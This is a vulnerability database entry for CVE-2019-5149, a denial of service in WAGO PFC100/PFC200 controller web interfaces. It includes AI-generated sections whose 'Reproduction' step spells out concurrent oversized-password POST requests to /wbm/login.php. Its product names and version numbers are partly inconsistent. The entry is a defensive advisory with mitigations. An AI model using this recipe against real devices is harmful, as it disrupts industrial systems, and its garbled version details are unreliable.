CVE-2019-5149
Description
The WBM web application on firmwares prior to 03.02.02 and 03.01.07 on the WAGO PFC100 and PFC2000, respectively, runs on a lighttpd web server and makes use of the FastCGI module, which is intended to provide high performance for all Internet applications without the penalties of Web server APIs. However, the default configuration of this module appears to limit the number of concurrent php-cgi processes to two, which can be abused to cause a denial of service of the entire web server. This affects WAGO PFC200 Firmware version 03.00.39(12) and version 03.01.07(13), and WAGO PFC100 Firmware version 03.00.39(12) and version 03.02.02(14).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
WAGO PFC100/PFC200 lighttpd FastCGI default config limits concurrent php-cgi processes to two, enabling remote DoS.
Vulnerability
The WBM web application on WAGO PFC100 (firmware prior to 03.02.02) and PFC2000 (firmware prior to 03.01.07) runs on a lighttpd web server with FastCGI. The default configuration in /etc/lighttpd/mod_fastcgi.conf sets "max-procs" => 2, limiting concurrent php-cgi processes to two [1]. This affects versions 03.00.39(12) and 03.02.02(14) for PFC100, and 03.00.39(12) and 03.01.07(13) for PFC200 [1].
Exploitation
An unauthenticated attacker with network access to the web server (CVE-2019-5149) can exhaust the limited php-cgi process pool by sending a steady stream of legitimate HTTP requests that invoke the .php handler. Because the FastCGI pool cannot spawn more than two processes, subsequent requests time out or fail, leading to a denial of service condition for all web server clients [1].
Impact
Successful exploitation causes a denial of service of the entire web server. The impact is limited to availability; no confidentiality or integrity compromise occurs. The CVSSv3 score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) [1].
Mitigation
WAGO has addressed the issue in firmware 03.02.02 for PFC100 and 03.01.07 for PFC200 [1]. Users should upgrade to these or later versions. As a workaround, administrators can edit /etc/lighttpd/mod_fastcgi.conf to increase the "max-procs" value to a higher number, though this may affect system resource usage. The vulnerability is not listed in the CISA KEV catalog to date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
4- Wago/WAGO PFC100 Firmwarev5Range: version 03.00.39(12)
- Range: version 03.00.39(12)
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient resource pool: the FastCGI configuration limits concurrent php-cgi processes to two, allowing an attacker to exhaust all workers with slow requests."
Attack vector
An unauthenticated attacker sends POST requests to `/wbm/login.php` with a large password field (tens-of-thousands of characters) [ref_id=1]. Each such request ties up one of the two available php-cgi processes for approximately 50 seconds (the configured `idle-timeout`) because PHP's `crypt()` function is slow on large inputs [ref_id=1]. By sending multiple concurrent requests, the attacker can exhaust both FastCGI worker processes, causing a denial of service that blocks all legitimate access to the WBM web application for an indefinite period [ref_id=1]. No authentication or special network position is required; the attack is launched over the network against the device's web interface [CWE-410].
Affected code
The default FastCGI configuration file `/etc/lighttpd/mod_fastcgi.conf` on the WAGO PFC100 and PFC200 devices sets `"max-procs" => 2`, limiting concurrent php-cgi processes to two [ref_id=1]. This configuration is applied to the WBM web application's PHP handling, including the login endpoint `/wbm/login.php` [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the remediation guidance is implicit: the vendor released firmware versions 03.02.02 (PFC100) and 03.01.07 (PFC200) that address this issue [ref_id=1]. The fix would involve increasing the `max-procs` value in `/etc/lighttpd/mod_fastcgi.conf` to allow more concurrent php-cgi processes, or implementing rate-limiting and input-size validation on the login endpoint to prevent a single slow request from monopolizing a worker process [ref_id=1]. Without a larger process pool, an attacker can trivially exhaust all available FastCGI workers.
Preconditions
- configThe target device must be running a vulnerable firmware version (PFC200 < 03.01.07, PFC100 < 03.02.02)
- networkThe WBM web application must be reachable over the network
- authNo authentication required; the attacker sends unauthenticated POST requests
- inputThe attacker sends a large password payload (tens-of-thousands of characters) in the POST body
Reproduction
Send a POST request to `/wbm/login.php` with a JSON body containing a large password field, e.g. `{"username":"admin","password":"a"*30000}` [ref_id=1]. Repeat this request multiple times concurrently to exhaust both FastCGI php-cgi processes. Each request will occupy a worker for approximately 50 seconds (the `idle-timeout`), causing a denial of service of the entire WBM web application [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- talosintelligence.com/vulnerability_reports/TALOS-2019-0939mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.